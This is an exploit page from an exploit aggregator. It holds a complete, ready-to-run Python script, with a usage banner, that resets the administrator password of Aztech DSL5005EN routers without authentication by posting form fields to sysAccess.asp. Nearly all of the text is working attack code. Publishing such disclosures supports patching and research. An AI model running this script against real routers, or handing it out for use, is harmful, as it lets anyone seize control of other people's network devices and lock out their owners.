Exploit for Aztech DSL5005EN Authentication Bypass

Name: Exploit for Aztech DSL5005EN Authentication Bypass
Rating: 5 (15 reviews)
2025-03-24 | CVSS 7.7
## https://sploitus.com/exploit?id=PACKETSTORM:189978
# Exploit Title: Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)
    # Date: 2025-02-26
    # Exploit Author: Amir Hossein Jamshidi
    # Vendor Homepage: https://www.aztech.com
    # Version: DSL5005EN
    # Tested on: Linux
    # CVE: N/A
    
    import requests
    import argparse
    
    print('''
    #################################################################################
    #       aztech DSL5005EN router/modem - admin password change (Unauthenticated) #
    #                   BY: Amir Hossein Jamshidi                                   #
    #               Mail: amirhosseinjamshidi64@gmail.com                           #
    #           github: https://github.com/amirhosseinjamshidi64                    #
    #       Usage: python Exploit.py --ip TRAGET_IP --password PASSWORD             #
    #################################################################################
    ''')
    
    def change_password(ip_address, password):
        """
        Changes the password of a device at the given IP address.
    
        Args:
            ip_address: The IP address of the device (e.g., "192.168.1.1").
            password:   The new password to set.
        """
    
        url = f"http://{ip_address}/cgi-bin/sysAccess.asp"
        origin = f"http://{ip_address}"
        referer = f"http://{ip_address}/cgi-bin/sysAccess.asp"
    
        payload = {
            "saveFlag": "1",
            "adminFlag": "1",
            "SaveBtn": "SAVE",
            "uiViewTools_Password": password,
            "uiViewTools_PasswordConfirm": password
        }
    
        headers = {
            "Cache-Control": "max-age=0",
            "Accept-Language": "en-US,en;q=0.9",
            "Origin": origin,
            "Content-Type": "application/x-www-form-urlencoded",
            "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
            "Referer": referer,
            "Connection": "keep-alive"
        }
    
        try:
            response = requests.post(url, data=payload, headers=headers, timeout=10)
    
            if response.status_code == 200:
                print(f"Password change request to {ip_address} successful!")
                print(f"Username: admin")
                print(f"Password: {password}")
            else:
                print(f"Request to {ip_address} failed with status code: {response.status_code}")
                print(f"Response content:\n{response.text}")  # Print response for debugging
    
        except requests.exceptions.RequestException as e:
            print(f"An error occurred: {e}")
    
    
    if __name__ == "__main__":
        parser = argparse.ArgumentParser(description="Change password of a device.")
        parser.add_argument("--ip", dest="ip_address", required=True, help="The IP address of the device.")
        parser.add_argument("--password", dest="password", required=True, help="The new password to set.")
        args = parser.parse_args()
    
        change_password(args.ip_address, args.password)